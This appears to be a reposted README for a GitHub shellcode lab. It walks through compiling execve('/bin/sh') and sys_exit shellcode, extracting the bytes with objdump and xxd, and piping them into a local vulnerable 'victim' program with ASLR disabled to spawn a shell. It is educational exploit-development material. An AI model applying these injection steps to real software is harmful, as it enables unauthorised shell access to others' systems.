shellcode for execve penetration test.
Main Program:
1. exec /bin/sh with shellcode.
2. call sys_exit with shellcode.
debugging with gef
Dependencies:
+ Gcc on Gnu/Linux
+ gdb
exec /bin/sh with shellcode:
————————————-
Steps
(1) Compile: ” gcc shell.c -o shell ”
(2) Find the start and end of shellcode in shell: ” objdump -d shell | sed -n ‘/shell_start/,/shell_end/p’ ”
In my code, shell_begin is 0x3de, shell_end is 0x3f8
(3) Find length of expected shellcode: ” echo $((0x3f8-0x3de)) ”
The length is 26 and we will choose 32 which is the multiple of 8.
(4) Round the shellcode length to 32 (next multiple of 8) and use xxd to convert the binary to char: ” xxd -s0x3de -l32 -p shell shellcode ”
(5) Compile the run program (make it executable via “chmod 755 cmpshell.sh”) ” ./cmpshell.sh ”
(6) Attack our vulnerable program (also disable ASLR) and get a bash shell ” ((cat shellcode | xxd -r -p) ; cat) | setarch arch -R ./victim ”
Note:
1. There is no prompt in the shell because the standard input is provided by cat, and not the terminal (/dev/tty).
2. shellcode should not contain any NULL.
call sys_exit with shellcode:
————————————-
Steps
(1) Compile: ” gcc shell.c -o shell ”
(2) Find the start and end of shellcode in shell: ” objdump -d shell | sed -n ‘/shell_start/,/shell_end/p’ “In my code, shell_start is 0x3de, shell_end is 0x3e6
(3) Find length of expected shellcode: ” echo $((0x3e6-0x3de)) ”
(4) Use xxd to convert the binary to char (length exactly 8 bytes): ” xxd -s0x3de -l8 -p shell shellcode ”
(5) Compile the run program (make it executable via “chmod 755 cmpshell.sh”) ” ./cmpshell.sh ”
(6) Attack our vulnerable program (also disable ASLR)– result: the current process is terminated ” ((cat shellcode | xxd -r -p) ; cat) | setarch arch -R ./victim ”
Note:
1. shellcode should not contain any NULL.
Usage & Download from git:
git clone https://github.com/harryskon/shellcode && cd shellcode open directory inside shellcode folder then compile and run one by one
Source: https://github.com/harryskon